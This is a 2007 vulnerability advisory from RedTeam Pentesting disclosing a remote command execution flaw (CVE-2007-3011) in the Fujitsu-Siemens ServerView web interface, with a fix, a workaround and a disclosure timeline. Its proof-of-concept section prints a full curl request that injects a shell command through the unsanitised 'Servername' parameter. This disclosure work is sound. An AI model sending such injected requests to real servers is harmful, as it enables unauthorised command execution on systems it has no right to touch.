fujitsu-serverview-exec.txt

`Advisory: Fujitsu-Siemens ServerView Remote Command Execution  
  
RedTeam Pentesting discovered a remote command execution in the Fujitsu-  
Siemens ServerView during a penetration test. The DBAsciiAccess CGI  
script is vulnerable to a remote command execution because of a  
parameter which is not properly sanitized. An attacker may run arbitrary  
commands on the server with the permissions of the webserver user.  
  
  
Details  
=======  
  
Product: Fujitsu Siemens Computers ServerView  
Affected Versions: < 4.50.09  
Fixed Versions: 4.50.09  
Vulnerability Type: Remote Command Execution  
Security-Risk: high  
Vendor-URL:   
http://www.fujitsu-siemens.com/products/standard_servers/system_management/control.html  
Vendor-Status: informed, fixed version released  
Advisory-URL: http://www.redteam-pentesting.de/advisories/rt-sa-2007-002.php  
Advisory-Status: public  
CVE: CVE-2007-3011  
CVE-URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3011  
  
  
Introduction  
============  
  
"ServerView provides asset management tools for automated analysis and  
version maintenance. It also supports the tracking of system  
installation and status by collecting inventory data. Because they are  
stored centrally, archives can be readily compared to a master version  
to trace changes over time and highlight differences with the original  
setup."  
  
(from the vendor's homepage)  
  
  
More Details  
============  
  
ServerView has a Remote Command Execution in its Webinterface. The  
DBAsciiAccess CGI script provides a "ping" functionality. In the  
subparameter "Servername" of the parameter "Parameterlist" of this  
script, the IP address to be pinged is given. This IP address will be  
given as a parameter to the ping program without further sanitization.  
By adding a trailing semicolon after the IP, an attacker can add  
arbitrary shell commands which will be executed with the permissions of  
the webserver user.  
  
  
Proof of Concept  
================  
  
The following URL was wrapped for better readability.  
  
curl  
"http://www.example.com/cgi-bin/ServerView/  
SnmpView/DBAsciiAccess  
?SSL=  
&Application=ServerView/SnmpView  
&Submit=Submit  
&UserID=1  
&Profile=  
&DBAccess=ASCII  
&Viewing=-1  
&Action=Show  
&ThisApplication=TestConnectivityFrame  
&DBElement=ServerName  
&DBValue=bcmes  
&DBList=snism  
&UserValue=  
&DBTableList=SERVER_LIST  
&Sorting=  
&ParameterList=What--primary,,  
OtherCommunity--public,,  
SecondIP--,,  
Timeout--5,,  
Community--public,,  
ServerName--bcmes,,  
Servername--127.0.0.1;id;,, # vulnerable parameter  
SType--Server"  
  
  
  
Workaround  
==========  
  
Block access to the ServerView web interface for all untrusted users.  
  
  
Fix  
===  
  
Version 4.50.09 of the linux agent fixes the problem. It can be downloaded   
with  
the SW-ID: 1013988 under  
  
http://www.fujitsu-siemens.com/support  
  
Fujitsu-Siemens decided to make a silent fix, as the vulnerability is not  
mentioned in the comments of the patch. They told RedTeam Pentesting that it  
is fixed in this version, though.  
  
  
Security Risk  
=============  
  
The security risk is high. An attacker is able to execute arbitrary  
commands on the server with the permissions of the webserver user.   
  
  
History  
=======  
  
2007-05-07 First contact with vendor. No one who is responsible found,  
contact will call back with further information.  
2007-05-08 A responsible contact for the product is found and gets the  
advisory  
2007-05-09 The vulnerability gets acknowledged as not being known  
before. A fix is being worked on.  
2007-06-18 CVE number assigned  
2007-07-04 Vendor releases fixed version  
2007-07-04 Advisory released  
  
  
RedTeam Pentesting GmbH  
=======================  
  
RedTeam Pentesting is offering individual penetration tests, short  
pentests, performed by a team of specialised IT-security experts.  
Hereby, security weaknesses in company networks or products are  
uncovered and can be fixed immediately.  
  
As there are only few experts in this field, RedTeam Pentesting wants to  
share its knowledge and enhance the public knowledge with research in  
security related areas. The results are made available as public  
security advisories.  
  
More information about RedTeam Pentesting can be found at  
http://www.redteam-pentesting.de.  
  
--   
RedTeam Pentesting GmbH Tel.: +49 241 963-1300  
Dennewartstr. 25-27 Fax : +49 241 963-1304  
52068 Aachen http://www.redteam-pentesting.de/  
Germany Registergericht: Aachen HRB 14004  
Geschäftsführer: Patrick Hof, Jens Liebchen, Claus R. F. Overbeck  
`